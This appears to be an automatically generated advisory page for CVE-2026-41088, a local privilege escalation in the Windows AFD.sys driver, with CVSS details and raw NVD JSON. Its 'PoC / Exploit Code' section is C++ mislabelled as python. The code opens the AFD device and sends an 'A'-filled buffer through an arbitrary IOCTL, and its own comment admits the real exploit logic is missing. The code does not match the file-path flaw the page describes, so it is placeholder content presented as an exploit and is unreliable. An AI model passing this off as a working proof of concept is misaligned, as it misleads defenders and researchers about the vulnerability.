Security Vulnerability Report
中文
CVE-2026-41088 CVSS 7.8 HIGH

CVE-2026-41088

Published: 2026-05-12 18:17:21
Last Modified: 2026-05-13 15:34:53

Description

External control of file name or path in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Windows 10
Windows 11
Windows Server 2019/2022 (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <windows.h> #include <iostream> // PoC for CVE-2026-41088 // Vulnerability: External control of file name or path in AFD.sys // Impact: Local Privilege Escalation int main() { HANDLE hDevice; DWORD bytesReturned; char inputBuffer[0x1000]; // Target the AFD driver hDevice = CreateFileA("\\\\.\\Afd", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { std::cout << "Failed to open device." << std::endl; return 1; } std::cout << "Device opened. Exploiting..." << std::endl; // Initialize buffer with payload memset(inputBuffer, 'A', sizeof(inputBuffer)); // Trigger the vulnerability via IOCTL // Note: Actual IOCTL code and exploit logic depend on patch diffing DeviceIoControl(hDevice, 0x000120C3, inputBuffer, sizeof(inputBuffer), NULL, 0, &bytesReturned, NULL); CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41088", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:20.573", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "External control of file name or path in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41088", "source": "[email protected]"}]}}